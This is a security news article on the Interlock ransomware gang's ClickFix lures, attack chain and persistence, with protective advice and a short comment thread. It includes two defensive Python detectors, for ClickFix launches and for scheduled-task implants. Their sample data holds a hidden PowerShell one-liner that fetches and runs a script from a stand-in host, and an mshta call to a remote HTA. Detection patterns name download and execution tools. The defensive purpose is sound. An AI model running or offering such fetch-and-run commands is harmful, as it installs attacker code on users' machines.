
Summary
The Interlock ransomware gang has adopted the ClickFix attack, a social engineering tactic tricking users into executing malicious commands disguised as IT tool fixes. This dangerous trend bypasses traditional security measures, highlighting the increasing sophistication of ransomware attacks. Protecting yourself requires vigilance and a healthy dose of skepticism.
Main Story
The Interlock ransomware gang, known for targeting FreeBSD and Windows systems since late September 2024, has added a new weapon to its arsenal: the ClickFix attack. This social engineering tactic involves deceiving users into executing malicious PowerShell commands disguised as solutions to IT problems. Researchers observed this shift in Interlock’s tactics as early as January 2025, with the gang setting up fake websites mimicking legitimate platforms like Microsoft Teams and Advanced IP Scanner.
ClickFix: A Deep Dive
ClickFix attacks exploit a simple yet effective social engineering tactic. Victims encounter fake CAPTCHA prompts or error messages on websites and are instructed to copy and paste commands into their system’s command prompt or terminal. These commands, instead of resolving the purported issue, download and execute malicious code. This method bypasses security measures that typically flag malicious downloads by having the user initiate the execution themselves. The supposed fix often involves running a PowerShell script, which sets the stage for malware installation and further compromise.
Interlock’s ClickFix campaign involves creating convincing replicas of well-known IT tools, furthering the deception. One identified lure mimics the popular Advanced IP Scanner software. When a user clicks the provided “fix it” button, a malicious installer package downloads, installing a seemingly functional version of Advanced IP Scanner alongside hidden malware. This malware includes components like Lumma Stealer and Berserk Stealer, designed to steal sensitive information like login credentials and financial data.
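The execution pattern described above (a user pastes a download-and-run command into a terminal or Run box, so the shell is spawned directly from Explorer or a browser rather than by a service or installer) is something endpoint telemetry can be screened for. The following is an added example, not code from the article or from any vendor: a small scoring heuristic in Python over constructed process-creation records. The field names (`parent_image`, `image`, `command_line`), the indicator lists and the threshold are assumptions of this example, loosely modelled on what a generic EDR or Sysmon-style export contains, and the sample events are constructed, not real telemetry.

```python
"""Heuristic screen for ClickFix-style execution: an interactive shell launched
straight from a user-facing process, with a command line that both fetches
and runs content. All records below are CONSTRUCTED samples (assumption of
this example); the field layout mimics a generic process-creation export."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    event_id: int
    parent_image: str   # image name of the parent process
    image: str          # image name of the created process
    command_line: str   # full command line as logged


# Interpreters a pasted command typically ends up in (assumed list).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that indicate a person launched the shell by hand: the Run box is
# hosted by Explorer, and ClickFix lures are served from a browser.
USER_LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Indicator patterns commonly seen in paste-and-run one-liners. These are
# heuristics for triage, not a complete signature set.
DOWNLOAD = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|curl|wget|downloadstring|net\.webclient|"
    r"bitsadmin|certutil)\b|https?://")
EXECUTE = re.compile(r"(?i)\b(iex|invoke-expression|start-process|mshta|rundll32)\b")
EVASION = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\s|-nop\b|"
    r"-ep\s+bypass|-executionpolicy\s+bypass)")


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons): one point per independent indicator."""
    reasons = []
    if ev.image.lower() in SHELLS and ev.parent_image.lower() in USER_LAUNCHERS:
        reasons.append("shell spawned directly from a user launcher")
    if DOWNLOAD.search(ev.command_line):
        reasons.append("download indicator in command line")
    if EXECUTE.search(ev.command_line):
        reasons.append("in-memory execute indicator in command line")
    if EVASION.search(ev.command_line):
        reasons.append("hidden-window or policy-bypass flags")
    return len(reasons), reasons


def detect_clickfix(events, threshold: int = 3):
    """Return [(event_id, reasons)] for events at or above the threshold.
    Requiring several indicators keeps ordinary admin use of `cmd /c dir`
    or a service-launched script from being flagged."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev.event_id, reasons))
    return hits


# Constructed sample events (not real telemetry). Event 1 models a pasted
# ClickFix one-liner; event 4 models a browser-launched HTA lure; events 2
# and 3 are benign.
SAMPLE_EVENTS = [
    ProcessEvent(1, "explorer.exe", "powershell.exe",
                 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/fix.ps1).Content"'),
    ProcessEvent(2, "services.exe", "powershell.exe",
                 r"powershell -File C:\Scripts\backup.ps1"),
    ProcessEvent(3, "explorer.exe", "cmd.exe", "cmd /c dir"),
    ProcessEvent(4, "chrome.exe", "mshta.exe", "mshta https://example.invalid/captcha.hta"),
]

if __name__ == "__main__":
    for event_id, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
```

In a real deployment the records would come from the endpoint agent's process-creation feed, and the indicator lists would be tuned against the organisation's own baseline; the point of the example is that the parent/child relationship carries as much signal as the command-line contents, because a legitimately scheduled or service-launched PowerShell job does not descend from Explorer or a browser.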
The Interlock Attack Chain
After the initial infection, the Interlock gang utilizes various tools like PuTTY, AnyDesk, and LogMeIn for lateral movement within the compromised network. This movement relies on stolen credentials acquired through the initial malware payload or other means. Data exfiltration to attacker-controlled Azure Blob storage typically precedes the ransomware deployment. As a final step, the ransomware gets scheduled to run daily at a specific time, ensuring persistence and redundancy in the attack chain.
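The persistence step described above, a scheduled task that runs the ransomware daily, leaves a durable artifact in the task inventory that can be compared against a known-good baseline. The following is an added example, not code from the article or from any vendor: a Python checker over constructed scheduled-task records that flags new daily tasks whose action lives in a user-writable directory or goes through a script interpreter. The record layout (`name`, `author`, `trigger`, `action`, `run_as`), the baseline set, the path patterns and the finding threshold are assumptions of this example, and the sample tasks are constructed, not real data.

```python
"""Checker for scheduled-task persistence of the kind the article describes
(ransomware registered to run daily). Records and baseline below are
CONSTRUCTED (assumption of this example); the layout is loosely modelled on
a task inventory export or a task-creation audit event."""
import re
from dataclasses import dataclass


@dataclass
class TaskRecord:
    name: str
    author: str
    trigger: str   # e.g. "DAILY 03:00", "ATLOGON", "ONCE" (assumed format)
    action: str    # command line the task executes
    run_as: str    # principal the task runs under


# Locations a non-admin user or a dropped installer can write to. A task
# whose executable lives here is worth a look regardless of its name.
USER_WRITABLE = re.compile(
    r"(?i)(\\users\\[^\\]+\\appdata\\|\\temp\\|\\programdata\\|"
    r"\\users\\public\\|%appdata%|%temp%)")
# Script hosts and LOLBins frequently used as task actions by malware.
INTERPRETERS = re.compile(
    r"(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b")


def assess_task(task: TaskRecord, baseline: set[str]) -> list[str]:
    """Return the list of findings for one task (empty list = nothing odd)."""
    findings = []
    if task.name not in baseline:
        findings.append("not in baseline inventory")
    if task.trigger.upper().startswith("DAILY"):
        findings.append("daily trigger")
    if USER_WRITABLE.search(task.action):
        findings.append("action in user-writable path")
    if INTERPRETERS.search(task.action):
        findings.append("action invokes script interpreter")
    if task.run_as.upper() in {"SYSTEM", "NT AUTHORITY\\SYSTEM"}:
        findings.append("runs as SYSTEM")
    return findings


def suspicious_tasks(tasks, baseline: set[str], min_findings: int = 3):
    """Return [(task_name, findings)] for tasks with enough stacked findings.
    A single property (a daily trigger, or running as SYSTEM) is normal on
    its own; it is the combination that marks a likely implant."""
    results = []
    for task in tasks:
        findings = assess_task(task, baseline)
        if len(findings) >= min_findings:
            results.append((task.name, findings))
    return results


# Constructed baseline: task names recorded before the incident window.
BASELINE = {"MicrosoftEdgeUpdateTaskMachineCore", "BackupNightly"}

# Constructed sample inventory: two legitimate tasks, two modelled implants.
SAMPLE_TASKS = [
    TaskRecord("BackupNightly", "CORP\\svc_backup", "DAILY 01:00",
               r"C:\Program Files\Backup\backup.exe /full", "CORP\\svc_backup"),
    TaskRecord("MicrosoftEdgeUpdateTaskMachineCore", "Microsoft", "ATLOGON",
               r"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe /c",
               "SYSTEM"),
    TaskRecord("SystemHealthCheck", "WORKSTATION7\\jdoe", "DAILY 20:00",
               r"C:\Users\jdoe\AppData\Roaming\conhost.exe", "SYSTEM"),
    TaskRecord("UpdateCheck", "WORKSTATION7\\jdoe", "DAILY 08:30",
               r"powershell.exe -w hidden -File C:\ProgramData\upd.ps1",
               "WORKSTATION7\\jdoe"),
]

if __name__ == "__main__":
    for name, findings in suspicious_tasks(SAMPLE_TASKS, BASELINE):
        print(f"{name}: {'; '.join(findings)}")
```

The baseline comparison is the part that matters operationally: a task inventory snapshot taken during normal operations turns "is this task odd?" into "did this task exist last week?", which is a far cheaper question to answer during an incident than trying to judge each task on its name.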
Ransomware as a Service
Unlike many modern ransomware gangs, Interlock doesn’t operate on a Ransomware-as-a-Service (RaaS) model. They directly manage their operations, including attacks and ransom demands, which have reached millions of dollars in some cases. Their dark web portal, the “Worldwide Secrets Blog,” serves as a platform for publishing stolen data as a means to pressure victims into paying. Recent ransom notes also demonstrate an evolution in Interlock’s tactics, now emphasizing potential legal and regulatory ramifications of a data breach.
Protecting Yourself from ClickFix Attacks
The rise of ClickFix attacks underscores the growing reliance on social engineering by cybercriminals. Protecting yourself and your organization requires a multi-pronged approach:
- Be skeptical: Exercise caution when encountering online prompts that ask you to copy and paste commands. Verify the authenticity of the website and source before taking any action.
- Keep software updated: Ensure all software, including operating systems and browsers, is up-to-date with the latest security patches.
- Employ strong passwords: Utilize unique and strong passwords for all accounts and enable multi-factor authentication whenever possible.
- Educate yourself: Stay informed about emerging threats and social engineering tactics like ClickFix to better recognize and avoid them.
- Endpoint security: Deploy robust endpoint security solutions that include behavior-based detection capabilities to catch malicious activity even if it bypasses traditional signature-based defenses.
- Incident response plan: Having a plan in place is crucial to contain the damage if an attack occurs. This plan should include procedures for isolating infected systems, restoring data from backups, and engaging with law enforcement or cybersecurity professionals.
The growing sophistication of ransomware attacks like those perpetrated by Interlock necessitates a proactive and vigilant approach to cybersecurity. By staying informed and adopting preventive measures, individuals and organizations can significantly reduce their risk of falling victim to these evolving threats.
So, Interlock prefers to DIY their ransomware, huh? I guess that means no franchising opportunities for the rest of us aspiring cyber-villains? Asking for a friend who’s *really* good at PowerShell… and world domination.
That’s right! Interlock keeps it in-house. It seems their bespoke approach allows them to rapidly adapt their tactics, like the ClickFix attack we highlighted. Maybe your ‘friend’ could share some PowerShell tips for *defending* against world domination attempts instead! Always good to have skilled allies.
Editor: StorageTech.News
Thank you to our Sponsor Esdebe
Given Interlock manages their operations directly, I wonder what motivates this choice, considering the prevalence of the RaaS model? Does this indicate a different risk/reward calculation, or a desire for greater control over the entire attack lifecycle?
That’s a great question! Their direct management approach is indeed interesting. It could be that Interlock believes end-to-end control allows them to better protect their methods and infrastructure, giving them a competitive edge and allowing them to evolve faster than RaaS affiliates might be able to.